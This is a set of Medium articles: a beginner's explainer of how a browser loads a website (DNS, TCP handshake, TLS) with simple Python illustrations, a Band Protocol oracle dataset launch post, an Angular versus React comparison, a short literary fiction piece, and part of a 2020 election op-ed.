Source: https://medium.com/@ruitiagoblog/radical-transparency-3d30e2379b96 (Rui Costa, 2019-10-17). Tags: Transparency, Coaching, Learning, Agile, Life
Something Good.
Equal parts magic and tragic, musings from someone who still feels like they’re 12. But definitely are not.
Source: https://medium.com/mischke-business/something-good-9c32127e204e (Anna Mischke, 2018-09-10). Tags: Music, Inspiration, Alt J, Personal
How it works: visiting a website from your browser
When you type the address of a website into the address bar of a browser, like https://www.holbertonschool.com, multiple steps take place in the background, even though you see the site within seconds.
Steps 1: URL
The first step, of course, is you put the URL of the website into the address and hit enter which is something you probably do dozens of times a day.
What is URL?
URL stands for Uniform Resource Locator. A URL is nothing more than the address of a given unique resource on the web. A URL is composed of different parts, some mandatory and others optional. Let’s consider this example:
the URL structure shown above has different parts with different purpose, let’s discuss the main ones:
Scheme (protocol): it tells the browser which protocol to use when it accesses a resource on the Internet. In the example, it is HTTPS (Hypertext Transfer Protocol Secure), which is the most common scheme currently.
: it tells the web servers which protocol to use when it accesses a resource on Internet. In the example, it is HTTPS (Hypertext Transfer Protocol Secure) — which is the most common scheme currently. Domain name: it indicates which web server is being requested. ‘www.holbertonschool.com’ is the domain in the example. An IP address can be used but it is rare since it is less convenient. We can further divide the domain into parts, as follows:
Subdomain: A subdomain in a URL indicates which particular part of your website the web browser should serve up. Second-level Domain: is the name of the website. It helps people know they’re visiting a certain brand’s site. For instance, people who visit “holbertonschool.com” know they’re on Holberton school’s website, without needing any more information. Top-level Domain: specifies what type of entity your organization registers as on the internet. For example, “.com” is intended for commercial entities and “.edu” is intended for academic institutions.
Port: is a unique number used to access the resources on the web server. It is usually omitted if the web server uses the standard port for the scheme (in the example it is omitted, so the HTTPS default of port 443 applies; for HTTP the default is 80).
: is a unique number used to access the resources on the web server. It is usually omitted if the web server uses the standard ports ( in the example, it is omitted so it uses the standard port of the HTTPS protocol i.e. 443 for HTTP it is 80). File path (path): tells your web browser to load a specific page. In the example, ‘/methodology’ is the path. If no path is specified (i.e. only a domain name is entered) then, the browser loads the default page, which usually helps you to navigate to other pages in the website.
The discussion above presents only the fundamental parts of a URL. However, a URL can have additional parts not included in this discussion. For more about URLs, you can use the reference here.
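To see these parts programmatically, here is Python's standard-library parser applied to the example URL (the explicit :443 is added only so the port field shows up; it is normally omitted):

```python
from urllib.parse import urlparse

url = "https://www.holbertonschool.com:443/methodology"
parts = urlparse(url)
print(parts.scheme)    # https
print(parts.hostname)  # www.holbertonschool.com
print(parts.port)      # 443
print(parts.path)      # /methodology

# The hostname splits further into subdomain / second-level / top-level domain:
subdomain, sld, tld = parts.hostname.split(".")
print(subdomain, sld, tld)  # www holbertonschool com
```

Note that urlparse separates the port out of the netloc for you, so hostname is just the domain name the DNS steps below will resolve.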
Step 2: DNS
Computers and other network devices communicate using IP address to identify each other on the internet. URLs are human-friendly and IP addresses are computer-friendly.
So, when you enter the URL, https://www.holbertonschool.com, your request to load that page is sent to DNS servers that look up the domain name www.holbertonschool.com to find its corresponding IP address. Without the IP address, the computer has no clue what it is that you’re after.
What is DNS?
DNS stands for Domain Name System, a technology that translates domain names into IP addresses. DNS is the phone book of the Internet.
How does DNS work?
In order to understand the DNS resolution process, you need to learn about the four types of DNS servers involved in loading a web page. Apart from sending the initial request, your computer is not directly involved in the resolution process.
1. DNS resolver: is usually run by your ISP (Internet Service Provider), but it can also be operated by your wireless carrier or a third-party provider. The resolver knows which other DNS servers it needs to ask to answer the query “What is the IP address of www.holbertonschool.com?”. It also keeps a cache of the IP addresses of frequently requested domain names. Every resolver must know one thing: where to locate the root servers. The resolver can be thought of as a librarian who is asked to go find a particular book somewhere in a library. It is also called a recursive DNS name server.
2. Root name servers: are the first step in the name resolution of any domain name. A root server can be thought of like an index in a library that points to different racks of books: it serves as a reference to other, more specific locations. The root server knows where to locate the top-level domains (.com, .net, .org), country-code top-level domains (.no, .et, .uk), internationalized top-level domains (ccTLDs written in a country’s local characters), infrastructure TLDs, and generic TLDs (.hot, .pizza, .app, …).
3. TLD name servers: a Top-Level Domain (TLD) server can be thought of as a specific rack of books in a library. The TLD is the last part of the domain name, that is, the label that follows the last dot of a fully qualified domain name. For example, in the domain name www.holbertonschool.com, the top-level domain is com. The coordination of most top-level domains (TLDs) belongs to the Internet Corporation for Assigned Names and Numbers (ICANN).
4. Authoritative name server: provides the original and definitive answers to DNS queries. This is where the domain administrator has configured the DNS records for the domain. This final name server can be thought of as a dictionary on a rack of books.
Steps in a DNS lookup
You type the URL, https://www.holbertonschool.com, and hit Enter.
1. First, your browser checks whether it already knows the IP address of the domain by looking in its own cache and the OS’s cache. If it doesn’t find one, the OS calls the resolver.
2. When the resolver receives the request, it checks its cache first. If the address of the website is not cached in the resolver’s system, it will need to ask the authoritative DNS hierarchy for the answer. To get to the authoritative server, however, the resolver sends a request to a root name server first.
3. The root server responds to the resolver with the address of the TLD DNS server (in this case, .com). The resolver stores this information for future reference.
4. The resolver then sends a request to the TLD server. The TLD server responds with the names and IP addresses of the domain’s authoritative name servers (these are called glue records). The resolver stores the addresses. The figure below shows the authoritative servers of holbertonschool.com and the IP address of one of the servers.
5. The resolver sends a query to the authoritative name server, which responds with the IP address of www.holbertonschool.com.
6. The resolver responds to your OS with the domain’s IP address, and the OS provides it to the browser.
Without DNS, you would have to remember lists of IP addresses instead of website names or URLs. For a more fun and detailed description of the DNS resolution process, check this.
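The lookup steps can also be sketched as a toy resolver with a cache. Everything here is hard-coded for illustration (the server names and the IP address are made up); a real resolver speaks the DNS protocol over the network:

```python
# Hypothetical, hard-coded hierarchy standing in for the real DNS servers.
ROOT = {"com": "tld-com-server"}                              # root -> TLD server
TLD = {"holbertonschool.com": "authoritative-server"}         # TLD -> authoritative
AUTHORITATIVE = {"www.holbertonschool.com": "52.47.143.83"}   # name -> IP (illustrative)

cache = {}  # the resolver's cache of previously answered queries

def resolve(name):
    """Walk root -> TLD -> authoritative, caching the final answer."""
    if name in cache:                        # answered before: no lookups needed
        return cache[name]
    tld = name.rsplit(".", 1)[-1]            # "com"
    _tld_server = ROOT[tld]                  # step: ask a root server for the TLD server
    domain = ".".join(name.split(".")[-2:])  # "holbertonschool.com"
    _auth_server = TLD[domain]               # step: ask the TLD server for the authoritative server
    ip = AUTHORITATIVE[name]                 # step: ask the authoritative server for the IP
    cache[name] = ip                         # remember for next time
    return ip

print(resolve("www.holbertonschool.com"))  # first call walks the whole hierarchy
print(resolve("www.holbertonschool.com"))  # second call is answered from the cache
```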
Step 3: Browser sends a connection request to the website
Once your browser gets the IP address of the website, it starts to set up a connection. The setup process is accomplished using a three-way handshake (aka SYN-SYN-ACK). This handshake is designed so that two computers that want to communicate can negotiate the parameters of the connection before transmitting data such as the browser’s request.
Before talking about the three-way handshake process, let’s first discuss the meanings of the messages used to negotiate and start a session.
SYN (Synchronize): used to initiate and establish a connection. It also synchronizes sequence numbers between the devices. ACK (Acknowledgment): confirms to the other side that its SYN has been received. SYN-ACK (Synchronize-Acknowledgment): a SYN message from the local device combined with an ACK of the earlier packet. FIN: used to terminate a connection.
The Three-Way Handshake Process
Step 1: Your browser (the client) initiates a connection with the web server. It sends a segment with the SYN flag set and informs the server of the sequence number the client will start with.
Step 2: The server responds to the client’s request with the SYN and ACK flags set. The ACK acknowledges the segment that was received, and the SYN indicates the sequence number the server will start its segments with.
Step 3: Your browser then responds to the web server with an ACK, and a stable connection is established between the two.
Three-way handshake
The initial sequence number is random; it marks the beginning of the sequence numbers for the data that the sender will transmit.
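The sequence-number bookkeeping is easy to sketch. A toy simulation (real initial sequence numbers are chosen by the operating system's TCP stack; the dictionaries here stand in for TCP segments):

```python
import random

def three_way_handshake():
    """Simulate SYN -> SYN-ACK -> ACK. Each ACK acknowledges the peer's
    sequence number + 1, which is how the two sides synchronize."""
    client_seq = random.randint(0, 2**32 - 1)   # random initial number, chosen by the client
    # Step 1: client sends SYN with its initial sequence number.
    syn = {"flags": "SYN", "seq": client_seq}

    server_seq = random.randint(0, 2**32 - 1)   # random initial number, chosen by the server
    # Step 2: server answers SYN-ACK, acknowledging the client's SYN.
    syn_ack = {"flags": "SYN-ACK", "seq": server_seq, "ack": syn["seq"] + 1}

    # Step 3: client acknowledges the server's SYN; the connection is established.
    ack = {"flags": "ACK", "seq": syn["seq"] + 1, "ack": syn_ack["seq"] + 1}
    return syn, syn_ack, ack

syn, syn_ack, ack = three_way_handshake()
print(syn["flags"], syn_ack["flags"], ack["flags"])  # SYN SYN-ACK ACK
```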
Step 4: SSL/TLS certificate
After the browser and the server set up a stable connection, the browser will first check whether the server provides some security. Before we talk about how your browser checks the security, let us talk about SSL/TLS.
What is SSL?
The acronym “SSL” stands for Secure Sockets Layer. SSL is a standard security technology for creating an encrypted network link between a server and a client, ensuring all data passed between them is private and secure. TLS, its successor, stands for Transport Layer Security.
You may have noticed while exploring the Internet that certain websites use HTTP and others use HTTPS (which our example uses). The difference between the two protocols is an SSL certificate. The ‘S’ in HTTPS stands for secure: the communication between your computer and the web server of an HTTPS-enabled website is encrypted using an SSL certificate.
Why is SSL needed? SSL/TLS is a protocol used by applications to communicate securely across a network, preventing tampering and eavesdropping on email, web browsing, messaging, and other protocols. Any information transmitted between a client and a server is protected by the SSL certificate, using encryption.
Now, let us talk about how your browser checks for security. The browser downloads the web server’s certificate, which contains the public key of the web server. This certificate is signed with the private key of a trusted certificate authority. The public keys of the major certificate authorities come preinstalled in your browser. Your browser uses this public key to verify that the web server’s certificate was indeed signed by the trusted certificate authority.
After your browser has verified and authenticated the server, it uses the public key to establish a shared symmetric key, which will be used to encrypt the traffic on this connection. The generated key is encrypted with the public key of the web server and then sent back to the web server. This ensures that only the server can decrypt the key, since only it holds the private key.
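In Python, for example, this verification behavior is what `ssl.create_default_context()` enables. A sketch that inspects the defaults without opening any network connection:

```python
import ssl

# A default context loads the system's trusted certificate authorities and
# turns on the checks described above: the server's certificate must be
# signed by a trusted authority, and its hostname must match.
context = ssl.create_default_context()

print(context.verify_mode == ssl.CERT_REQUIRED)  # True: certificate must verify
print(context.check_hostname)                    # True: hostname must match

# To actually use it, the context would wrap a TCP socket, e.g.:
#   with socket.create_connection(("www.holbertonschool.com", 443)) as sock:
#       with context.wrap_socket(sock, server_hostname="www.holbertonschool.com") as tls:
#           ...  # traffic on `tls` is now encrypted
```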
Step 5: Browser downloads website data
Next, your browser sends a request to the website asking to download its data. This request contains some additional information, such as what browser you’re using and the purpose of the connection.
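On the wire, that request is plain text. A simplified sketch of the kind of GET request a browser sends (real browsers include many more headers):

```python
def build_request(host, path="/", user_agent="ExampleBrowser/1.0"):
    """Build a minimal HTTP/1.1 GET request as it appears on the wire."""
    lines = [
        f"GET {path} HTTP/1.1",       # method, resource path, protocol version
        f"Host: {host}",              # required in HTTP/1.1
        f"User-Agent: {user_agent}",  # "what browser you're using"
        "Connection: close",
        "",                           # blank line ends the header section
        "",
    ]
    return "\r\n".join(lines)

print(build_request("www.holbertonschool.com", "/methodology"))
```

The server parses this text, builds a response in the same header-then-body format, and sends it back.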
The server receives this request, and then generates a response in a particular format. It sends this response back to your browser.
Your browser receives the response, and uses it to render the website you requested.
Step 6: That’s it?
Once your browser displays the website, its work might not be done. If you click a link, the steps begin all over again. If you send some information to the page, the server uses that to perform an action. Depending on the website, your browser might also have to interact with the server in the background.
When everything comes together
One last thing… honorable mentions
The following are important components of the web serving and hosting process.
Load Balancer
Websites must serve hundreds of thousands, if not millions, of simultaneous requests from users and must return the correct text, images, videos, or application data in a fast and reliable manner. Meeting this high demand generally requires adding more servers and distributing the load across them.
A load balancer sits in front of the servers and routes client requests across all servers capable of responding. It distributes the workload across multiple individual systems, or groups of systems, to reduce the amount of load on any individual system. This ensures the reliability, efficiency, and availability of the service provided by the servers.
Load Balancer
The following are the main functions of a load balancer:
Distribute requests or network load efficiently across multiple servers
Ensure high availability and reliability by sending requests only to servers that are online
Provide the flexibility of scaling up and scaling down per demand.
A load balancer can be implemented in hardware or software. For more on load balancing, check here.
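The core job described above, distributing requests and skipping servers that are offline, fits in a few lines. A toy round-robin balancer (server names are made up; real load balancers also do health checks, TLS termination, and more):

```python
import itertools

class RoundRobinBalancer:
    """Cycle through servers, skipping any that are marked offline."""

    def __init__(self, servers):
        self.online = {s: True for s in servers}
        self._cycle = itertools.cycle(servers)

    def mark_offline(self, server):
        self.online[server] = False

    def pick(self):
        # Try each server at most once per call to find an online one.
        for _ in range(len(self.online)):
            server = next(self._cycle)
            if self.online[server]:
                return server
        raise RuntimeError("no servers available")

lb = RoundRobinBalancer(["web-1", "web-2", "web-3"])
print([lb.pick() for _ in range(4)])  # ['web-1', 'web-2', 'web-3', 'web-1']
lb.mark_offline("web-2")
print([lb.pick() for _ in range(3)])  # web-2 is skipped from now on
```

Round robin is only one strategy; others weigh servers by capacity or current connection count.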
Firewall
Firewalls are hardware, software, or a combination of both that filters all traffic coming into and out of a server. SSL/TLS is a crucial step in securely transmitting data across the Internet, but it does not account for the trustworthiness of the source. This is where firewalls come in: they use a combination of packet filters, application gateways, circuit-level gateways, and proxy servers to make certain that packets do not contain malicious content.
Database
A database is a collection of information that is organized so that it can be easily accessed, managed, and updated. Most modern websites perform complicated operations on data or present dynamic data. These operations should be handled by a separate database, typically implemented on a separate server. The database stores and retrieves data, manages updates, provides simultaneous access for web servers, enforces security, ensures the integrity of the data, and handles backups. Database Management Systems (DBMSs) are used to manage the data on the database server.
Web hosting with Database System
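What the database tier does can be sketched with an in-memory SQLite database standing in for a real database server such as MySQL or PostgreSQL (the table and query are invented for illustration):

```python
import sqlite3

# In production this would be a connection to a separate database server;
# an in-memory SQLite database keeps the sketch self-contained.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE pages (path TEXT PRIMARY KEY, visits INTEGER)")
conn.execute("INSERT INTO pages VALUES ('/methodology', 0)")

def record_visit(path):
    """What a web server might do on each request: update, then read back."""
    conn.execute("UPDATE pages SET visits = visits + 1 WHERE path = ?", (path,))
    return conn.execute(
        "SELECT visits FROM pages WHERE path = ?", (path,)
    ).fetchone()[0]

print(record_visit("/methodology"))  # 1
print(record_visit("/methodology"))  # 2
```

The web server only issues queries; storage, concurrency, and integrity are the DBMS's job.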
Application server
An application server is a server specifically designed to run applications: it hosts them. Its primary job is to enable interactions between end-user clients and server-side application code — often called business logic — to generate and deliver dynamic content, such as transaction results, decision support, or real-time analytics.
A web server is designed to serve web pages and is not able to run demanding web applications. An application server, by contrast, provides the processing power and memory to run these demanding web applications, along with the environment to run specific applications.
References
https://tecadmin.net/authoritative-non-authoritative-dns-server/
https://www.cloudflare.com/learning/dns/what-is-dns/
https://www.guru99.com/tcp-3-way-handshake.html
https://developer.mozilla.org/en-US/docs/Glossary/TCP_handshake
https://developer.mozilla.org/en-US/docs/Learn/Common_questions/What_is_a_URL
https://howdns.works/
https://blog.hubspot.com/marketing/parts-url
https://themeisle.com/blog/what-is-a-website-url/
https://www.techdim.com/what-is-application-server/
https://phoenixnap.com/blog/web-server-vs-application-server/
https://cheapsslsecurity.com/blog/what-is-ssl-tls-handshake-understand-the-process-in-just-3-minutes/?utm_source=AboutSSL&utm_medium=couponpage&utm_campaign=cheapcouponpage&utm_content=/how-ssl-certificate-work/
https://www.nginx.com/resources/glossary/load-balancing/
https://www.oreilly.com/library/view/web-database-applications/0596005431/ch01.html | https://medium.com/@yosefsamuel11/how-it-works-visiting-a-website-from-your-browser-d54fb9401b75 | [] | 2021-09-12 10:37:35.933000+00:00 | ['Internet', 'DNS', 'Ssl', 'Servers', 'Browsers'] |
Launching the Band Standard Dataset | As Band Protocol continues to rapidly scale our integrations and partnerships across the various blockchain platforms and applications, we are proud to announce the official launch of the Band Standard Dataset — an exhaustive reference price dataset with frequent updates and comprehensive, customizable feeds. With expansive support for crypto assets, commodities and foreign exchange rates, the Band Standard Dataset covers a growing set of 100+ price feeds for any decentralized finance protocol to readily integrate. Join the growing list of DeFi protocols and dApps that are using the Band Standard Dataset to enhance the security of your smart contracts.
👉 Build using the Band Standard Dataset today!
Price feeds underpin the majority of decentralized finance (DeFi) Protocols that exist today. The notional amount of value secured by DeFi continues to rise at an unprecedented rate, recently surpassing $15B among industry verticals such as lending, derivatives, synthetic assets, decentralized exchange, and stablecoins.
The all too common blockchain ‘oracle problem’ involves the reliability, security, and trustworthiness of third-party oracles and the trustless execution of smart contracts. Nevertheless, it is still habitual for many protocols to use bandaid solutions that come in the form of centralized or internal mechanisms which have the risks of ongoing maintenance costs, single points of failure, low-quality data, and lack of redundancy on both data source and validator layers.
For developers who prioritize performance and scalability, Band Protocol, a decentralized oracle network, has become the long-term solution to secure hundreds of millions of dollars in value locked up in smart contracts as seen in just Mirror Protocol and Fantom alone.
Before we shine a light on the Band Standard Dataset, let’s run through the two main requirements that a cutting-edge DeFi application needs:
Developers Require Comprehensive, Extensible, and Customizable Feeds
If there is one critical lesson we have learned from our conversations with over 90 projects, it’s that no two protocols’ data requirements are ever the same. However, the majority of price oracle solutions today are still extremely restrictive, offering predetermined datasets or unscalable procedures for creating a custom oracle, including curating and auditing your own set of trusted validators.
In addition to the relatively small number of supported tokens, the popular feeds provided by many oracles are also meant to be a one-size-fits-all solution, with little to no room for customization in parameters such as update time, price deviation, or security.
The lack of token support is especially detrimental to any protocols looking to support relatively newer or less popular tokens, including their own. In those cases, they would either have to request and wait for the third-party oracle to support the token, or use a centralized oracle implementation for different assets — neither of which is desirable due to major risk factors.
DeFi Deserves Frequent and In-Time Updates
Another key pain point we have identified is that the majority of other oracles update only intermittently, with the possible exception of the few most-used feeds such as BTC and ETH.
This shortcoming is due to the economics of actually pushing the price data on-chain combined with the associated transaction and network fees. While there are often percentage price deviation mechanics in place to aid with keeping the on-chain price updated, this is often unchangeable once the feed is live or requires a full redeployment where validators must be migrated along with underlying decentralized applications.
Introducing The Band Standard Dataset
With all of that in mind, we are thrilled to introduce the Band Standard Dataset. This dataset comprises a number of price feeds aimed at allowing developers to have the greatest diversity and flexibility in the price feed while maintaining the highest data quality and accessibility possible. | https://medium.com/bandprotocol/launching-the-band-standard-dataset-9c8b3fc16f12 | ['Sawit Trisirisatayawong'] | 2020-12-21 10:06:18.117000+00:00 | ['Launch', 'Decentralization', 'Defi', 'Blockchain Development', 'Technology'] |
Angular Vs. React — The Most Definite Comparison between two titans | Angular Vs. React — The Most Definite Comparison between two titans
Five key differences between Angular and React
Introduction
In today’s world, Angular and React are two of the most used frameworks for frontend development. The latest versions of the two technologies, Angular 9 and React 16, are both released under the MIT license (https://www.mit.edu/), an open-source license that requires minimal software redistribution effort. This means we don’t need to invest in a huge software setup to use Angular or React in our projects. Even though they are both JavaScript-based platforms, there are a few key differences between the two. Let’s explore the differences, shall we?
1. Basic Architecture — Framework Vs. Library
Angular is a complete framework, developed using TypeScript and HTML, whereas React is a JavaScript library, and development uses JavaScript and JSX. That said, React does support TypeScript as well, but it’s not as easy to find documentation or references in TypeScript as it is for Angular. Angular can also be developed in JavaScript, but that’s not widely done. If a developer is more comfortable in JavaScript than TypeScript, then it’s better to choose some other platform, React for instance.
Angular is a complete toolkit for creating applications. It provides solutions for routing, accessing data services, templating, etc. It brings a lot of consistency to developing an application, including how to structure projects. But there are some downsides to this structure: integrating classic JavaScript libraries can take some time to set up properly with TypeScript, and they sometimes need to be wrapped in some kind of Angular service to work with Angular components.
As React is a library, it doesn’t have all the components needed to build a complete application. There are a lot of React libraries that take care of routing, templating, etc. Tools like Create React App already include a lot of React libraries for different features. Besides, it’s easy to add additional libraries without much setup or complexity. The disadvantage of this is a lack of consistency: one can use different libraries/tools to achieve the same functionality, so for a team it’s important to decide which libraries to use.
2. Performance — Real DOM vs. Virtual DOM
React and Angular both rely on DOM or document object model. DOM represents a document as nodes and objects. It’s the object-oriented representation of a webpage.
Angular works on the real DOM, so any small change updates the entire tree structure.
React works with the virtual DOM. The virtual DOM is a lightweight snapshot of the real DOM. When anything changes, the entire virtual DOM is updated, but that update is superfast.
When it comes to updating the real DOM, React compares the virtual DOM with the real DOM and only updates the parts that have changed. This process is called diffing.
This gives React a speed/performance advantage over Angular for big, complex, and dynamic applications, as the entire DOM structure is not updated every time something changes.
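The diffing idea is framework-independent. A toy sketch (in Python for brevity, with flat dictionaries standing in for DOM trees) that reports only the nodes whose content changed:

```python
def diff(old_dom, new_dom):
    """Return only the nodes whose content changed between two snapshots,
    mirroring how React patches just the changed parts of the real DOM.
    (Removed nodes are ignored for brevity.)"""
    changes = {}
    for node_id, content in new_dom.items():
        if old_dom.get(node_id) != content:
            changes[node_id] = content
    return changes

old = {"header": "Welcome", "counter": "0 clicks", "footer": "© 2020"}
new = {"header": "Welcome", "counter": "1 click", "footer": "© 2020"}
print(diff(old, new))  # {'counter': '1 click'} — only this node needs touching
```

React's real algorithm works on nested component trees and uses heuristics to keep the comparison fast, but the payoff is the same: only the changed nodes are written to the real DOM.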
3. Data Binding — Two-way vs. One way
Angular uses two-way data binding: event binding to bind events to methods, and property binding to pass data from the component class and set the properties of elements in the view. It takes care of the element properties as well.
React, on the other hand, is based on a single source of truth: its state. Here a UI element can only be changed by changing the model state. State can only be changed via the “setState” method, and the UI is always re-rendered on a state change. Since the data flow is one-directional, we have more control and consistency.
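This one-way flow can be sketched as a toy component (Python pseudo-code, not the real React API): state is the single source of truth, `set_state` is the only way to change it, and every change re-renders:

```python
class Counter:
    """Toy one-way data flow: the UI is always a pure function of state."""

    def __init__(self):
        self.state = {"count": 0}
        self.rendered = self.render()

    def render(self):
        # The "UI" is derived from state and nothing else.
        return f"Count: {self.state['count']}"

    def set_state(self, **updates):
        # The only sanctioned way to change state; the UI re-renders after.
        self.state.update(updates)
        self.rendered = self.render()

c = Counter()
c.set_state(count=c.state["count"] + 1)
print(c.rendered)  # Count: 1
```

Because the rendered output can never drift out of sync with the state, debugging becomes a matter of inspecting one object.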
4. Code Structure — Design and logic separation vs. All in one place.
In Angular, the design and the logic are separated into HTML and TypeScript. Even though the binding syntax takes some time to get used to, the code separation makes it easy to structure the application. Learning Angular can be quite complex at times.
In React, we have logic and design in one place. The learning curve for Angular is quite steep compared to React. But if you are used to Angular, you might not like the code structure in React, which can take away React’s benefit of being easy to grasp.
5. Developer and Popular Uses — Google vs. Facebook
Angular is developed and maintained by Google. It’s used in several Google applications, such as the Firebase Console, Google Analytics, and Google Express, and by Forbes, Upwork, and others outside Google.
React is developed and maintained by Facebook. It’s used by Facebook, Instagram, WhatsApp etc. And Airbnb, Uber, Netflix, Dropbox etc. outside FB. | https://medium.com/medialesson/angular-vs-react-the-most-definite-comparison-between-two-titans-1d95d89e3f6 | ['Rituparna Goswami Mishra'] | 2020-09-04 19:06:00.090000+00:00 | ['JavaScript', 'Angular', 'Typescript', 'Web Development', 'React'] |
The Men Who Bought Saturday | The Men Who Bought Saturday
The high life comes at a high price
Image courtesy of the author
AS MATT PLACED THE GLASS OF ORANGE JUICE IN FRONT OF HER, he said, “You need to stay here today.” He was drinking out of an espresso cup with a thin gold band around the rim, holding it daintily above her head. She could smell his aftershave, the prep-school essence of synthetic roses and a splash of lavender. It was the smell of soft hands that picked up nothing other than the cheque at a restaurant. The sunshine reflected dully off his immaculate white shirt as he sat opposite her and needlessly adjusted his cufflinks. He wanted to draw attention to them, how heavy they looked. How expensive.
“And do what?” she asked, “count your shoes?”
He took another clean sip from the espresso cup. “Stay out of trouble,” Matt suggested.
His voice signposted the class of company he kept, the kind of muted executive swagger one collects when ascending multiple wage brackets. He was still undoubtedly Australian, but an educated one: he pronounced his t’s as t’s and didn’t slice off the ends of his words. It was war-ter not waw-dah, and it was going and not goin’.
Hannah hated how money had changed him so obviously. He sounded ridiculous.
She slapped her hand on the glass table. “Matt, it’s a Saturday! I need to go out and do something, you can’t just keep me stuck in here. It’s ten am, for fuck sake! What could I do to get myself in trouble at ten in the morning?”
Matt raised his eyebrows as if to say, You’ll think of something. Of course he didn’t say this, and smoothly redirected conversation: “I’ve got a meeting today at eleven. You aren’t needed for any of it, but I do need you to stay here. That would make things a lot easier for me and I’d be done by three, anyway, so just watch Foxtel or something. God forbid, read a book.”
For a moment Hannah wanted to throw the glass at his face, watch it explode over his glossy expensive skin. Blood and orange juice would splatter all over his blue suit, a grand’s worth of tailoring ruined and the potential for permanent facial damage. It was a promising idea, but she thought better of it and instead picked at the sleeve of her — Matt’s — dressing gown.
They both knew what happened when thoughts like these became regrettable, irreversible actions.
“Piss off, smartarse,” she conceded. “I didn’t bring a book with me, and it’s not like you’ve got any good ones here.” Hannah hooked a thumb over her shoulder toward the bookshelf, which was mostly empty. “What, a few John Grishams, the odd Dean Koontz… and a shitload of books about ore mining. Pretty crap library, mate.”
Matt’s eyes narrowed and seemed to darken, a sharp transition from hazel to black that Hannah found disquieting. This repertoire of threatening facial expressions seemed to be something else he had acquired from money, something to earn him kudos in board meetings, perhaps, as the new-money yuppie with something to prove in his Ralph Lauren shirt and Fred Astaire shoes. But Hannah saw through that. His cheeks were still too pink, his brown hair too curly; he was, for all intents and purposes, the same thirteen-year-old boy who caught geckos in lunchboxes on Auntie Gina’s veranda.
“I didn’t ask you here for your opinion,” he said.
“You didn’t ask me to be here at all.”
Matt laid his ankle on his knee and placed his hands on his calf, one smooth motion that suggested it had been performed on repeat occasions. “It doesn’t make things much easier for me, no. I like my own space, so I’d prefer it if you weren’t here. But that’s the way it is.”
He shrugged.
“You always did stay in your room a lot,” Hannah said. “I think you still like living inside your own head, the only difference now that you’ve got a big fuck-off apartment to hide out in.”
“You say that as though all this just fell into my lap.”
“Well with the job you’ve got, yeah, seems that way. You earn more in a year than I reckon I would in four lifetimes, and I really can’t say what exactly the fuck it is you do, Matt.”
He looked into his espresso cup as though a fly were drowning in it. Hannah remembered that he had always been fascinated by small animals in enclosed spaces. She certainly felt like one in this apartment: the floor-to-ceiling windows made it feel like a fish tank.
Matt finally emptied his cup with one quick sip, and as he stood up the steel chair grunted quietly across the wooden floorboards. He checked the time on a small Omega with a blue dial, an ocean on his wrist.
“New watch?” Hannah asked.
“Hm? Oh, I need to upgrade this one, actually. Had for it about a year now.”
She laughed bitterly. “Yeah, Jesus, that’s fuckin’ ancient.”
“Look, is there anything else you want? Some more toast? There are a few eggs left so help yourself.”
She lifted the glass of orange juice and swilled it around. “This’d be better with vodka.”
Matt said nothing and she retorted to his silence by draining the glass.
Matt took his espresso cup and walked to the narrow island of marble planted beside the kitchen table. He placed the cup in the sink and, flicking the tap on, a soft white bolt of water exploded the residual coffee grains out of the bottom. He wiped his hands on a tea towel, even though they weren’t wet.
“Right, I’ll see you later. Give me a call if anything happens.” He grabbed his bag off the kitchen counter, threaded his hands through his jacket. “Bye.”
He closed the door behind him.
And Hannah didn’t know what to do. It was ten am, only ten am, and the day felt vastly unpromising. She had been here two days in this shiny white purgatory, channel-hopping and eating away the hours with Indian takeaways charged to Matt’s credit card. He had given her licence to order whatever she wanted, but every bite was a sour reminder of her dependency on his charity, the shame of it just a further tax upon her bankrupted self-worth.
She decided to have another shower. | https://medium.com/prismnpen/the-men-who-bought-saturday-c206cd9fdfca | ['Liam Heitmann-Ryce'] | 2020-12-26 14:18:53.212000+00:00 | ['Money', 'Class', 'Australia', 'Fiction', 'Storytelling'] |
If You Really Think Trump Is Favored in 2020, You Haven’t Thought It Through | Photo by Darren Halstead on Unsplash
[NOTE: Six months later this story is still being sent around, and virtually everything in it is out of date. A few times I’ve thought about revising it based on new information, but I decided it would be better to leave it as it was originally, so the predictions can be revisited after the election. Keep in mind that it was written before the pandemic, before George Floyd, and everything else that has changed the race since then.]
A recent poll from Monmouth found that two out of three Americans think Trump will win re-election this fall. That poll found, though it didn’t report, that two out of three Americans are wrong.
It does often appear these days that a second Trump term is inevitable, because he can do anything he wants and no one can find a way to make him pay for it. No one can stop him in office, so how can anyone stop him from staying in office? We may be stuck with him until he feels like leaving — which is never, according to him.
All of that is an illusion and a misdirection. What the politicians in Washington do is foolish and pitiable, but more importantly it’s only part of the story. The voters are the only ones who haven’t yet been given an opportunity to stop Trump. But that opportunity is coming soon, and they do intend to exercise it.
If it looks to you like Trump is cruising to victory in November, then either you want it too badly, or you’re too afraid of it to see clearly. Consider this argument:
1. Trump squeaked out his victory in the Electoral College by the smallest of margins, despite losing the popular vote by a large amount. If he loses any voters from battleground states in 2020, he must make them up somewhere else, or he loses the election.
2. Trump was aided in 2016 by several highly unlikely events which will not be repeated in 2020, suggesting he will lose voters compared to his first campaign.
3. Trump’s approval ratings have never been higher than when he was elected, suggesting he has lost people who voted for him the first time.
4. Democratic turnout will be higher in 2020 than it was in 2016.
5. Therefore Trump can’t make up the voters he has lost since 2016.
6. Therefore Trump will lose in 2020.
Premise 1 — The Electoral College
I hear the shouts already: “ELECTORAL COLLEGE! ELECTORAL COLLEGE!” And it’s true, I’ve also seen the analyses suggesting that Trump could lose the popular vote by as much as 5% and still win re-election. So this is an objection to the first premise: the claim is that Trump actually could lose voters compared to last time, and still get re-elected.
Fine, let’s do the Electoral College first.
The results of the Electoral College depend on the popular vote in each state. Trump won several states in 2016 by fairly small margins. He won Pennsylvania, Florida, Michigan and Wisconsin by less than 2%. How are those states polling now? [Update: Obviously Trump’s choices are significantly reduced since this was first written, when there were still six viable candidates in the race.]
Michigan: Trump is losing to all of the top five Democratic candidates, generally by significant margins.
Florida: Trump loses to Biden, beats Bloomberg, runs neck-and-neck with Sanders, Warren and Buttigieg.
Pennsylvania: Trump loses to Biden and Sanders, and is maybe slightly behind Warren. For Buttigieg and Bloomberg, there aren’t enough polls.
Wisconsin: Trump loses to Biden and Sanders, beats Buttigieg, and appears to be even with Warren, or slightly behind. Not enough polls for Klobuchar and Bloomberg.
Even if Trump wins every other state he won in 2016, he needs to face either Buttigieg or Klobuchar to have a good chance to win the election. There are other states he could easily lose.
